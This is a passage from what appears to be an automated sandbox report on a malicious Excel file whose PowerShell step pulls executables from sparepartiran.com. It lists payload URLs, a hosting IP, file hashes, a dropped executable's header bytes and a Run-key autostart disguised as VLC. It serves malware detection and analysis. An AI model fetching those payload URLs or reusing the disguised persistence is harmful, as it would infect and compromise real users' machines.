                                                                                            https://discord.com/4powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001A.00000000.446951571.0000000000E32000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001C.00000002.505256342.0000000000F42000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001E.00000002.513514027.0000000000BA2000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001F.00000000.504629114.0000000000332000.00000002.00020000.sdmp, kzsuoseu.exe, 00000020.00000002.513169061.0000000000512000.00000002.00020000.sdmp, vlc.exe.28.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://outlook.office365.com/autodiscover/autodiscover.json915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                              high
                                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                high
                                                                                                http://sparepartiran.cpowershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                  high
                                                                                                  http://crl.micropowershell.exe, 00000016.00000002.496165200.0000022BEDD0D000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://discord.com/8powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001A.00000000.446951571.0000000000E32000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001C.00000002.505256342.0000000000F42000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001E.00000002.513514027.0000000000BA2000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001F.00000000.504629114.0000000000332000.00000002.00020000.sdmp, kzsuoseu.exe, 00000020.00000002.513169061.0000000000512000.00000002.00020000.sdmp, vlc.exe.28.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                    high
                                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                      high
                                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                        high
                                                                                                        http://weather.service.msn.com/data.aspx915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                          high
                                                                                                          https://apis.live.net/v5.0/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                            high
                                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                              high
                                                                                                              http://sparepartiran.comxpowershell.exe, 00000015.00000002.467224652.000001F1AB2E2000.00000004.00000001.sdmptrue
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                high
                                                                                                                https://management.azure.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designersGkzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://incidents.diagnostics.office.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers/?kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.founder.com.cn/cn/bThekzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/ios915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                            high
                                                                                                                            http://www.fontbureau.com/designersGKkzsuoseu.exe, 0000001C.00000003.473829271.000000000640B000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.fontbureau.com/designers?kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://sparepartiran.com/js/2Q/0mpowershell.exe, 00000016.00000002.470123468.0000022B80DD9000.00000004.00000001.sdmptrue
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://insertmedia.bing.office.net/odc/insertmedia915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://o365auditrealtimeingestion.manage.office.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    162.223.88.131
                                                                                                                                    unknownUnited States
                                                                                                                                    19084COLOUPUStrue

                                                                                                                                    Private

                                                                                                                                    IP
                                                                                                                                    192.168.2.1

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                    Analysis ID:324119
                                                                                                                                    Start date:28.11.2020
                                                                                                                                    Start time:12:00:22
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 13m 24s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:light
                                                                                                                                    Sample file name:x2hGv.xls
                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                    Number of analysed new started processes analysed:33
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.evad.winXLS@17/13@3/2
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 0.2% (good quality ratio 0.2%)
                                                                                                                                    • Quality average: 77.1%
                                                                                                                                    • Quality standard deviation: 32.2%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                    • Attach to Office via COM
                                                                                                                                    • Scroll down
                                                                                                                                    • Close Viewer
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.109.76.68, 52.109.8.22, 52.109.12.24, 23.210.248.85, 51.104.144.132, 20.54.26.129, 51.103.5.186, 52.142.114.176, 92.122.213.194, 92.122.213.247
                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    12:02:43API Interceptor353x Sleep call for process: splwow64.exe modified
                                                                                                                                    12:02:50API Interceptor75x Sleep call for process: powershell.exe modified
                                                                                                                                    12:03:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
                                                                                                                                    12:03:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    162.223.88.1315901777.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/2Q/5901777.pdf.exe
                                                                                                                                    Hm0L8.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/2Q/Mvyfnzkjh1.exe
                                                                                                                                    5080132.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/1Q/Lfswmnuywzkn9.exe
                                                                                                                                    Ref 0047.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/2Q/Yvvtz1.exe
                                                                                                                                    633307.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/2Q/Wzdgpx2.exe
                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/2Q/Twvaedwzfyck1.exe
                                                                                                                                    4640578.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/2Q/Bolgkwpzwqs8.exe
                                                                                                                                    6021557.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/d1/8YAOuE8zfTpo1M9.exe
                                                                                                                                    INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/d1/IT4l74TKgSA7p92.exe
                                                                                                                                    ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/d1/SDJ-0488.exe
                                                                                                                                    yp7kw0211047.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/d1/411.exe
                                                                                                                                    Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/s0/11056.jpg
                                                                                                                                    SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/s0/SD-1061.jpg
                                                                                                                                    NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                                    • sparepartiran.com/js/s0/zz1ecco.jpg

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    sparepartiran.com5901777.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    Hm0L8.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    5080132.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    Ref 0047.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    633307.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    4640578.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    6021557.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    yp7kw0211047.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    COLOUPUS5901777.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    Hm0L8.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    5080132.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    Ref 0047.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    633307.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    4640578.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    6021557.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    yp7kw0211047.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131
                                                                                                                                    NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                                    • 162.223.88.131

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSecuriteInfo.com.Trojan.MulDrop15.61981.23282.exeGet hashmaliciousBrowse
                                                                                                                                      C:\Users\Public\kzsuoseu.exeSecuriteInfo.com.Trojan.MulDrop15.61981.23282.exeGet hashmaliciousBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):518656
                                                                                                                                        Entropy (8bit):7.09167824863409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:KIZ3fgZbssXFtV1lZ09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxxxxxU:KIhgdssXFt9ZIFqy
                                                                                                                                        MD5:B7679C443E22238291F5603F016FF56E
                                                                                                                                        SHA1:8E17BEE5C61B8383A3AD6F16701A204A62F6D05A
                                                                                                                                        SHA-256:BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
                                                                                                                                        SHA-512:C9936D1382DFEC2E81E9DC26DD41D877734A89242DB847CC2C7B4CA5448AED0A4596220AB462A9EABA1A3866C23CB6544590AB3DDBF935E249409206B5AD56B3
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.MulDrop15.61981.23282.exe, Detection: malicious, Browse
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+._.....................*........... ........@.. .......................@............@.....................................K........&................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc....&.......(..................@..@.reloc....... ......................@..B........................H........1..x7......o....h...s...........................................0...........(....86...8........E....C...8..._...8>....(.... .....:....&8.....(.... .....9....& ....8.....(....8.....(.... .....:....& ....8....*....0..I.......8*.......E........g...........<.......!...8.... ......8:....(.... ....8....*8\... ....(....9....&8....8.... ....8....s...... ....(....9~...&8t...s...... ....(....9b...&8X.....o......j<!... ....(....9>...&84.....o....8o.........(....r...p...........
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kzsuoseu.exe.log
                                                                                                                                        Process:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1391
                                                                                                                                        Entropy (8bit):5.344111348947579
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                                                                                                                        MD5:E87C60A24438CC611338EA5ACB433A0A
                                                                                                                                        SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                                                                                                                        SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                                                                                                                        SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\915FEC95-1606-493C-B7E6-1E4392ED10F8
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):129952
                                                                                                                                        Entropy (8bit):5.37829965423342
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:4cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:SmQ9DQW+zBX8u
                                                                                                                                        MD5:2FBF7747DDA1A11CFDBC3CD2B537C3D6
                                                                                                                                        SHA1:44318DC9DDAB684378A63AB897C23CCF672DD3F8
                                                                                                                                        SHA-256:0232493B6E1D78566ED3570011A862AFF0053E3B6D97EF8CC4825A76E3472EAB
                                                                                                                                        SHA-512:F5EAABF3816414FF5C6DD38F22837ECDC2DCEF8278687E5BC2BFA213D5ED0226338EFD4DB7127A5F8122AE53E291180D999B8E5530DC829914DE5B6C21DD573B
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-28T11:01:22">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1192
                                                                                                                                        Entropy (8bit):5.325275554903011
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoSCvKDe9tCKnKJJxV:qEPerB4nqRL/HvSCv4e9tC4arV
                                                                                                                                        MD5:782ADD355EA12D0B95EDAD79ECB5C28B
                                                                                                                                        SHA1:89060030E954C0BE979FCBFE0288DBB09ECD843E
                                                                                                                                        SHA-256:32B6318D3D1F0CE26E68DC980A406D82BFF85FDDC54ABDBACCE32ED0F5CAD11F
                                                                                                                                        SHA-512:DD2FBAD2C961436F87393CAAC8820BA666F1C0BD9167C9726B668D012C3D91B1DBEBD4C4F188220492D9D35F1A6EB436FC27F4D673F02C835B7E2958E8C77D3E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hrp4d1r.dmh.psm1
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_begaqbs1.run.ps1
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0jepr4x.aqp.ps1
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjosyhgz.fm3.psm1
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
